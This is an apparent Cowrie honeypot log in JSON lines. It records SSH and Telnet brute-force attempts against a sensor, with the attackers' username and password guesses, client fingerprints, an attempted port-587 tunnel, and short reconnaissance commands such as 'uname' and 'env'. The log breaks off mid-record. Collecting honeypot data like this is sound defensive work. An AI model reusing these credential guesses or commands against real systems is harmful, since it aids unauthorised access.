{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:59:06.355667Z","src_ip":"212.227.235.229","session":"4f8e291fd22c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:59:06.966198Z","src_ip":"212.227.235.229","session":"4f8e291fd22c"}
{"eventid":"cowrie.login.success","username":"root","password":"redhat123","message":"login attempt [root/redhat123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:59:07.542509Z","src_ip":"212.227.235.229","session":"4f8e291fd22c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T16:59:07.671927Z","session":"4f8e291fd22c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T16:59:07.815526Z","src_ip":"212.227.235.229","session":"4f8e291fd22c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:59:07.959409Z","src_ip":"212.227.235.229","session":"4f8e291fd22c"}
{"eventid":"cowrie.session.closed","duration":13.102879524230957,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:59:15.441178Z","src_ip":"212.227.235.229","session":"211db48557a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55354,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb2285db11d","protocol":"ssh","message":"New connection: 212.227.235.229:55354 (1.2.3.4:22) [session: 4eb2285db11d]","sensor":"my-vps","timestamp":"2025-08-28T16:59:21.215945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:59:21.216910Z","src_ip":"212.227.235.229","session":"4eb2285db11d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:59:21.319043Z","src_ip":"212.227.235.229","session":"4eb2285db11d"}
{"eventid":"cowrie.login.failed","username":"sdadmin","password":"51nGleD","message":"login attempt [sdadmin/51nGleD] failed","sensor":"my-vps","timestamp":"2025-08-28T16:59:21.627568Z","src_ip":"212.227.235.229","session":"4eb2285db11d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:59:22.732086Z","src_ip":"212.227.235.229","session":"4eb2285db11d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61962,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ab49c3386f8","protocol":"ssh","message":"New connection: 217.72.205.35:61962 (1.2.3.4:22) [session: 2ab49c3386f8]","sensor":"my-vps","timestamp":"2025-08-28T17:00:33.087141Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:00:33.088327Z","src_ip":"217.72.205.35","session":"2ab49c3386f8"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":6650,"dst_ip":"1.2.3.4","dst_port":22,"session":"746819b2b11c","protocol":"ssh","message":"New connection: 80.94.95.112:6650 (1.2.3.4:22) [session: 746819b2b11c]","sensor":"my-vps","timestamp":"2025-08-28T17:03:25.601119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:03:25.602291Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:03:25.632425Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29051980","message":"login attempt [admin/29051980] failed","sensor":"my-vps","timestamp":"2025-08-28T17:03:25.840371Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29041991","message":"login attempt [admin/29041991] failed","sensor":"my-vps","timestamp":"2025-08-28T17:03:26.872935Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29031995","message":"login attempt [admin/29031995] failed","sensor":"my-vps","timestamp":"2025-08-28T17:03:27.906417Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28101987","message":"login attempt [admin/28101987] failed","sensor":"my-vps","timestamp":"2025-08-28T17:03:28.939776Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28061992","message":"login attempt [admin/28061992] failed","sensor":"my-vps","timestamp":"2025-08-28T17:03:29.972700Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:03:31.005436Z","src_ip":"80.94.95.112","session":"746819b2b11c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34312,"dst_ip":"1.2.3.4","dst_port":22,"session":"f58c4042b08a","protocol":"ssh","message":"New connection: 212.227.235.229:34312 (1.2.3.4:22) [session: f58c4042b08a]","sensor":"my-vps","timestamp":"2025-08-28T17:03:40.227782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:03:40.228676Z","src_ip":"212.227.235.229","session":"f58c4042b08a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:03:40.336661Z","src_ip":"212.227.235.229","session":"f58c4042b08a"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T17:03:40.662452Z","src_ip":"212.227.235.229","session":"f58c4042b08a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:03:41.773328Z","src_ip":"212.227.235.229","session":"f58c4042b08a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55308,"dst_ip":"1.2.3.4","dst_port":23,"session":"846072a0ce0b","protocol":"telnet","message":"New connection: 212.227.125.160:55308 (1.2.3.4:23) [session: 846072a0ce0b]","sensor":"my-vps","timestamp":"2025-08-28T17:06:03.914430Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55654,"dst_ip":"1.2.3.4","dst_port":22,"session":"e81a0ee93119","protocol":"ssh","message":"New connection: 212.227.235.229:55654 (1.2.3.4:22) [session: e81a0ee93119]","sensor":"my-vps","timestamp":"2025-08-28T17:06:19.014386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:06:19.015342Z","src_ip":"212.227.235.229","session":"e81a0ee93119"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:06:19.113237Z","src_ip":"212.227.235.229","session":"e81a0ee93119"}
{"eventid":"cowrie.login.failed","username":"dbadmin","password":"dbadmin","message":"login attempt [dbadmin/dbadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T17:06:19.409338Z","src_ip":"212.227.235.229","session":"e81a0ee93119"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:06:20.509826Z","src_ip":"212.227.235.229","session":"e81a0ee93119"}
{"eventid":"cowrie.session.closed","duration":31.363086700439453,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:06:35.277437Z","src_ip":"212.227.125.160","session":"846072a0ce0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56138,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dd832d65d71","protocol":"ssh","message":"New connection: 212.227.235.229:56138 (1.2.3.4:22) [session: 8dd832d65d71]","sensor":"my-vps","timestamp":"2025-08-28T17:06:52.183986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:06:52.184916Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T17:06:52.456598Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.login.success","username":"root","password":"101010%#","message":"login attempt [root/101010%#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:06:53.274872Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:06:53.840467Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T17:06:53.841200Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:06:54.138310Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:06:54.151141Z","src_ip":"212.227.235.229","session":"8dd832d65d71"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53836,"dst_ip":"1.2.3.4","dst_port":22,"session":"765527864f4c","protocol":"ssh","message":"New connection: 217.72.205.35:53836 (1.2.3.4:22) [session: 765527864f4c]","sensor":"my-vps","timestamp":"2025-08-28T17:07:22.189284Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:07:22.190593Z","src_ip":"217.72.205.35","session":"765527864f4c"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":28587,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d037d6ab409","protocol":"ssh","message":"New connection: 80.94.95.15:28587 (1.2.3.4:22) [session: 6d037d6ab409]","sensor":"my-vps","timestamp":"2025-08-28T17:07:51.199516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:07:51.200560Z","src_ip":"80.94.95.15","session":"6d037d6ab409"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:07:51.252052Z","src_ip":"80.94.95.15","session":"6d037d6ab409"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T17:07:51.563805Z","src_ip":"80.94.95.15","session":"6d037d6ab409"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:07:52.628886Z","src_ip":"80.94.95.15","session":"6d037d6ab409"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49306,"dst_ip":"1.2.3.4","dst_port":22,"session":"1622164a6405","protocol":"ssh","message":"New connection: 212.227.235.229:49306 (1.2.3.4:22) [session: 1622164a6405]","sensor":"my-vps","timestamp":"2025-08-28T17:09:42.571860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:09:42.573076Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:09:42.679158Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.login.success","username":"root","password":"eve","message":"login attempt [root/eve] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:09:42.997294Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:09:43.224714Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:09:43.225446Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:09:43.332572Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:09:43.333736Z","src_ip":"212.227.235.229","session":"1622164a6405"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35142,"dst_ip":"1.2.3.4","dst_port":22,"session":"374ed396974a","protocol":"ssh","message":"New connection: 212.227.235.229:35142 (1.2.3.4:22) [session: 374ed396974a]","sensor":"my-vps","timestamp":"2025-08-28T17:10:08.733057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:10:08.733943Z","src_ip":"212.227.235.229","session":"374ed396974a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"